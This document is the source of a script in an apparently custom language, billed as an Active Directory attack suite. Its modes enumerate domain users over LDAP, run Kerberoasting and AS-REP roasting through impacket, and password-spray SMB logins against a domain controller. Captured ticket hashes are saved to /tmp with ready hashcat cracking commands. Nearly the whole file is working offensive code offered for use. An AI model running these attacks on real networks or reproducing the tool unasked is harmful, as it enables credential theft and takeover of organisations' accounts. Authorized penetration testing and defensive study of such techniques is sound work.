# koppa-ad v1.0 — Active Directory attack suite
# Usage: koppa run koppa-ad <mode> <domain> <dc_ip>

import os, log, report

fn cmd_enum(domain, dc_ip) {
    log.info("===== AD Enumeration: {domain} @ {dc_ip} =====")
    let out = os.shell("ldapsearch -x -H ldap://{dc_ip} -b 'DC={domain}' '(objectClass=user)' sAMAccountName 2>/dev/null")
    for line in out.split("\n") {
        if line.contains("sAMAccountName:") {
            let user = line.replace("sAMAccountName: ", "")
            log.success("[+] User: {user}")
        }
    }
}

fn cmd_kerberoast(domain, dc_ip, user, pass) {
    log.info("===== Kerberoasting: {domain} =====")
    let out = os.shell("python3 -m impacket.examples.GetUserSPNs {domain}/{user}:{pass} -dc-ip {dc_ip} -request 2>/dev/null")
    if out.contains("$krb5tgs$") {
        log.success("[+] TGS hashes found!")
        log.info(out)
        fs.write("/tmp/kerberoast.txt", out)
        log.info("Saved to /tmp/kerberoast.txt")
        log.info("Crack: hashcat -m 13100 /tmp/kerberoast.txt rockyou.txt")
    } else {
        log.warn("[-] No SPNs found")
    }
}

fn cmd_asrep(domain, dc_ip, users_file) {
    log.info("===== AS-REP Roasting: {domain} =====")
    let out = os.shell("python3 -m impacket.examples.GetNPUsers {domain}/ -usersfile {users_file} -dc-ip {dc_ip} -format hashcat 2>/dev/null")
    if out.contains("$krb5asrep$") {
        log.success("[+] AS-REP hashes found!")
        log.info(out)
        fs.write("/tmp/asrep.txt", out)
        log.info("Crack: hashcat -m 18200 /tmp/asrep.txt rockyou.txt")
    }
}

fn cmd_spray(domain, dc_ip, users_file, password) {
    log.info("===== Password Spray: {password} =====")
    let users = fs.read_lines(users_file)
    for user in users {
        let out = os.shell("python3 -m impacket.examples.smbclient {domain}/{user}:'{password}'@{dc_ip} -c 'ls' 2>/dev/null")
        if out.contains("drw") {
            log.success("[+] Valid: {user}:{password}")
        }
    }
}

fn main() {
    let mode   = __args__[0]
    let domain = __args__[1]
    let dc     = __args__[2]
    if not mode {
        log.warn("Usage: koppa run koppa-ad <enum|kerberoast|asrep|spray> <domain> <dc_ip> [extra]")
        return
    }
    log.info("===== KOPPA AD Attack Suite v1.0 =====")
    if mode == "enum"        { cmd_enum(domain, dc) }
    if mode == "kerberoast"  { cmd_kerberoast(domain, dc, __args__[3], __args__[4]) }
    if mode == "asrep"       { cmd_asrep(domain, dc, __args__[3]) }
    if mode == "spray"       { cmd_spray(domain, dc, __args__[3], __args__[4]) }
    log.success("AD attack complete!")
}

